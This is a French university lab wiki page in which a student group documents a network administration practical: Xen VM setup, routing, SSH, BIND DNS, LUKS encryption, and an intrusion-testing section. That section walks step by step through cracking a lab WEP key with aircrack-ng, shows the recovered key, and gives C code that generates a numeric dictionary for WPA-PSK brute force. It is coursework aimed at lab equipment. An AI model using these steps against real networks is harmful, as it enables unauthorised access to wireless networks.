TP sysres IMA5sc 2020/2021 G3 : Différence entre versions
(→SSH) |
(→Routage du site IPv4) |
||
Ligne 48 : | Ligne 48 : | ||
1. ssh zabeth09 et zabeth30 | 1. ssh zabeth09 et zabeth30 | ||
+ | |||
2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0 | 2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0 | ||
+ | |||
3. enable | 3. enable | ||
+ | |||
4. conf t | 4. conf t | ||
+ | |||
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26 | 5. ip route 193.48.57.186 255.255.255.255 100.64.0.26 | ||
+ | |||
6. exit | 6. exit | ||
+ | |||
7. write | 7. write | ||
Version du 16 novembre 2020 à 14:48
TP PRA - SIMONIN/MERTZ - Clavaire
Sommaire
Informations générales
Hostname : Clavaire IP local : 100.64.0.25/28 IP publique : 193.48.57.178/28 URL : clavaire.site
Installation VirtualMachine
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info
xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster
Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg xen console clavaire
Pour quitter la VM : CTRL + ]
On ajoute des disques à notre VM :
//rename disque et formatage (lvrename/mkfs)
//modif .cfg pour ajouter disques
//transfert fichier /var vers nouvelle partition
//ajoute au /etc/fstab les disques
//mount -a
Routage du site IPv4
Dans VM : /etc/network/interfaces
iface eth0 inet static
address 193.48.57.186 netmask 255.255.255.255 up ip address add dev eth0 100.64.0.26/24 up ip route add default via 100.64.0.2 src 193.48.57.186 down ip address del dev eth0 100.64.0.26/24 down ip route del default via 100.64.0.2 src 193.48.57.186
Dans gateway
1. ssh zabeth09 et zabeth30
2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0
3. enable
4. conf t
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26
6. exit
7. write
Services Internet
SSH
modif /etc/ssh/sshd_config :
Changement port : PORT 2222 Login depuis root : PermitRootLogin yes
service ssh restart
on peut donc : ssh root@193.48.57.186 -p 2222
DNS
Ajout DNS :
- le faire dans gandi - modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN { type master; file "/etc/bind/db.clavaire.lan"; };
- puis avoir un ficher db.clavaire.lan :
; BIND data file for local loopback interface ; $TTL 604800 @ IN SOA ns1.clavaire.site. admin.clavaire.site. ( 6 ; Serial 604800 ; Refresh 86400 ; Retry 2419200 ; Expire 604800 ) ; Negative Cache TTL ; @ IN NS ns1.clavaire.site. ns1 IN A 193.48.57.186 www IN A 193.48.57.186
- relancer bind :
service bind9 restart
Tests d’intrusion
Cassage de clef WEP d’un point d’accès WiFi
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.
Dans un premier temps nous avons annalysé nos interfaces avec
airmon-ng
Le résultat obtenue est
PHY Interface Driver Chipset phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370
Nous obtenons ainsi l'interface de la clé WI-PI. Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.
airmon-ng start wlx40a5ef0f6518 3
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.
aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande
airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès
aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP
aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap
et nous obtenons notre clé pour la cracotte03
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] Decrypted correctly: 100%
Exploitation de failles du système
Cassage de mot de passe WPA-PSK par force brute
Code c pour générer le dictionnaire :
#include <stdio.h> #include <stdlib.h> int main(){ FILE *f; f = fopen("fichierbruteforce.txt","w"); if(f==NULL){ printf("Erreur lors de l'ouverture c'un fichier"); exit(1); } for(char a=0; a<10;a++) { for(char z=0; z<10;z++) { for(char e=0; e<10;e++) { for(char r=0; r<10;r++) { for(char t=0; t<10;t++) { for(char y=0; y<10;y++) { for(char u=0; u<10;u++) { for(char i=0; i<10;i++) { //printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i); fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i); } } } } } } } } fclose(f); return 0; }
Attaque de type "homme au milieu" par usurpation ARP
Intrusion sur un serveur d’application Web
Réalisations
Chiffrement de données
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:
df -h
Nous connaissons ainsi notre Filesystem:
fdisk /dev/sdb
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.
Puis nous quittons fdisk mais nous devons exécuter la commande
partprobe
Pour re-écrire dans la table de partition.
Nous commençons l'initialisations de notre clé cryptée
sudo cryptsetup luksFormat /dev/sdb1
sudo cryptsetup luksOpen /dev/sdb1 home
Nous pouvons accéder à notre clé depuis
cd /media/pifou/665....62/
Nous avons créé un fichier test en sudo à la racine.
sudo cryptsetup luksClose home
Cette commande permet de fermer notre clé cryptée.
Site Web
Achat de clavaire.site[1] sur gandi
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.